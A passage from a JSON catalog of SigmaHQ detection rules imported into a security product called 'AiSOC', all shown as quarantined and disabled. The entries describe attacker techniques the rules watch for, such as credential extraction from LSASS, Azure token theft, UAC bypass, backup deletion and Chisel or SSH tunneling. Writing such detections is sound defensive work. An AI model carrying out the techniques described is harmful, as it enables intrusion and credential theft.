"rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml" } }, { "id": "sigmahq-sigma-88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", "description": "Detects Obfuscated Powershell via use Rundll32 in 
Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" } }, { "id": "sigmahq-sigma-88a87a10-384b-4ad7-8871-2f9bf9259ce5", "type": "detection", "name": "Suspicious Regsvr32 Execution From Remote Share", "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-regsvr32-execution-from-remote-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml" } }, { "id": "sigmahq-sigma-88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "type": "detection", 
"name": "File Time Attribute Change", "description": "Detect file time attribute change to hide new or changes to existing files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-time-attribute-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" } }, { "id": "sigmahq-sigma-88d6e60c-759d-4ac1-a447-c0f1466c2d21", "type": "detection", "name": "Chromium Browser Instance Executed With Custom Extension", "description": "Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1176.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chromium-browser-instance-executed-with-custom-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88d6e60c-759d-4ac1-a447-c0f1466c2d21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml" } }, { "id": "sigmahq-sigma-88f0884b-331d-403d-a3a1-b668cf035603", "type": "detection", "name": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-groups-or-users-enumeration-using-powershell-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88f0884b-331d-403d-a3a1-b668cf035603", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" } }, { "id": "sigmahq-sigma-88f46b67-14d4-4f45-ac2c-d66984f22191", "type": "detection", "name": "Renamed Microsoft Teams Execution", "description": "Detects the execution of a renamed Microsoft Teams binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/renamed-microsoft-teams-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88f46b67-14d4-4f45-ac2c-d66984f22191", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_msteams.yml" } }, { "id": "sigmahq-sigma-88f680b8-070e-402c-ae11-d2914f2257f1", "type": "detection", "name": "PowerShell Base64 Encoded IEX Cmdlet", "description": "Detects usage of a base64 encoded \"IEX\" cmdlet in a process command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-iex-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88f680b8-070e-402c-ae11-d2914f2257f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml" } }, { "id": "sigmahq-sigma-894a8613-cf12-48b3-8e57-9085f54aa0c3", "type": "detection", "name": "Potential Base64 Encoded User-Agent", "description": "Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-base64-encoded-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_susp_base64.yml" } }, { "id": "sigmahq-sigma-89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", "type": "detection", "name": "Malicious PowerShell Commandlets - ScriptBlock", "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482", "T1087", "T1087.001", "T1087.002", "T1069.001", "T1069.002", "T1069", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-commandlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-898d5fc9-fbc3-43de-93ad-38e97237c344", "type": "detection", "name": "AppX Package Deployment Failed Due to Signing Requirements", "description": "Detects an appx package deployment / installation with the error code 
\"0x80073cff\" which indicates that the package didn't meet the signing requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-package-deployment-failed-due-to-signing-requirements.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_deployment_failed_signing_requirements.yml" } }, { "id": "sigmahq-sigma-899133d5-4d7c-4a7f-94ee-27355c879d90", "type": "detection", "name": "Python Inline Command Execution", "description": "Detects execution of python using the \"-c\" flag. 
This could be used as a way to launch a reverse shell or execute live Python code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-89a9a0e0-f61a-42e5-8957-b1479565a658", "type": "detection", "name": "UAC Bypass WSReset", "description": "Detects the pattern of UAC bypass via WSReset that is detectable with the default sysmon-config", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-wsreset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" } }, { "id": "sigmahq-sigma-89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "type": 
"detection", "name": "Local Groups Discovery - MacOs", "description": "Detects enumeration of local system groups", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-groups-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_local_groups.yml" } }, { "id": "sigmahq-sigma-89c42960-f244-4dad-9151-ae9b1a3287a2", "type": "detection", "name": "Suspicious File Write to Webapps Root Directory", "description": "Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.\nThis may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-write-to-webapps-root-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89c42960-f244-4dad-9151-ae9b1a3287a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_file_write_in_webapps_root.yml" } }, { "id": "sigmahq-sigma-89ca78fd-b37c-4310-b3d3-81a023f83936", "type": "detection", "name": "Schtasks Creation Or Modification With SYSTEM Privileges", "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/schtasks-creation-or-modification-with-system-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_system.yml" } }, { "id": "sigmahq-sigma-89f75308-5b1b-4390-b2d8-d6b2340efaf8", "type": "detection", "name": "Windows Backup Deleted Via Wbadmin.EXE", "description": "Detects the deletion of backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/windows-backup-deleted-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_backups.yml" } }, { "id": "sigmahq-sigma-8a1b2c3d-4e5f-6789-abcd-ef1234567890", "type": "detection", "name": "PUA - Memory Dump Mount Via MemProcFS", "description": "Detects execution of MemProcFS a memory forensics tool with the '-device' parameter.\nMemProcFS mounts physical memory as a virtual file system, allowing direct access to process memory and system structures.\nThreat actors were seen abusing this utility to mount memory dumps and then extract sensitive information from processes like LSASS or extract registry hives to obtain credentials, LSA secrets, SAM data, and cached domain credentials.\nMemProcFS usage that is not part of authorized forensic analysis should be treated as suspicious and warrants further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.001", "T1003.004", "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-memory-dump-mount-via-memprocfs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a1b2c3d-4e5f-6789-abcd-ef1234567890", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_memprocfs.yml" } }, { "id": "sigmahq-sigma-8a3038e8-9c9d-46f8-b184-66234a160f6f", "type": "detection", "name": "Potential Remote Desktop Tunneling", "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-desktop-tunneling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml" } }, { "id": "sigmahq-sigma-8a4519e8-e64a-40b6-ae85-ba8ad2177559", "type": "detection", "name": "Renamed BrowserCore.EXE Execution", "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-browsercore-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" } }, { "id": "sigmahq-sigma-8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "type": "detection", "name": "Group Has Been Deleted Via Groupdel", "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/group-has-been-deleted-via-groupdel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_groupdel.yml" } }, { "id": "sigmahq-sigma-8a582fe2-0882-4b89-a82a-da6b2dc32937", "type": "detection", "name": "Suspicious WmiPrvSE Child Process", "description": "Detects suspicious and uncommon child processes of WmiPrvSE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1204.002", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-wmiprvse-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "type": "detection", "name": "AWS RDS Master Password Change", "description": "Detects the change of database master password. It may be a part of data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-rds-master-password-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml" } }, { "id": "sigmahq-sigma-8a670c6d-7189-4b1c-8017-a417ca84a086", "type": "detection", "name": "Suspicious SQL Error Messages", "description": "Detects SQL error messages that indicate probing for an injection attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sql-error-messages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a670c6d-7189-4b1c-8017-a417ca84a086", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/sql/app_sqlinjection_errors.yml" } }, { "id": "sigmahq-sigma-8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "type": "detection", "name": "HackTool - SysmonEOP Execution", "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sysmoneop-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml" } }, { "id": "sigmahq-sigma-8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "type": "detection", "name": "Schtasks From Suspicious Folders", "description": "Detects scheduled task creations that have suspicious action command and folder combinations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/schtasks-from-suspicious-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml" } }, { "id": "sigmahq-sigma-8ac03a65-6c84-4116-acad-dc1558ff7a77", "type": "detection", "name": "Sysmon Configuration Change", "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_config_modification.yml" } }, { "id": "sigmahq-sigma-8ad1600d-e9dc-4251-b0ee-a65268f29add", "type": "detection", "name": "AWS Root Credentials", "description": "Detects AWS root account usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-root-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ad1600d-e9dc-4251-b0ee-a65268f29add", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_root_account_usage.yml" } }, { "id": "sigmahq-sigma-8ae51330-899c-4641-8125-e39f2e07da72", "type": "detection", "name": "DNS TXT Answer with Possible Execution Strings", "description": "Detects strings used in command execution in DNS TXT Answer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-txt-answer-with-possible-execution-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ae51330-899c-4641-8125-e39f2e07da72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_susp_txt_exec_strings.yml" } }, { "id": "sigmahq-sigma-8b0e12da-d3c3-49db-bb4f-256703f380e5", "type": "detection", "name": "PUA - Chisel Tunneling Tool Execution", "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", 
"category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-chisel-tunneling-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_chisel.yml" } }, { "id": "sigmahq-sigma-8b48ad89-10d8-4382-a546-50588c410f0d", "type": "detection", "name": "Remote AppX Package Downloaded from File Sharing or CDN Domain", "description": "Detects an appx package that was added to the pipeline of the \"to be processed\" packages which was downloaded from a file sharing or CDN domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-appx-package-downloaded-from-file-sharing-or-cdn-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b48ad89-10d8-4382-a546-50588c410f0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_downloaded_from_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-8b5dacf2-aeb7-459d-b133-678eb696d410", "type": "detection", "name": 
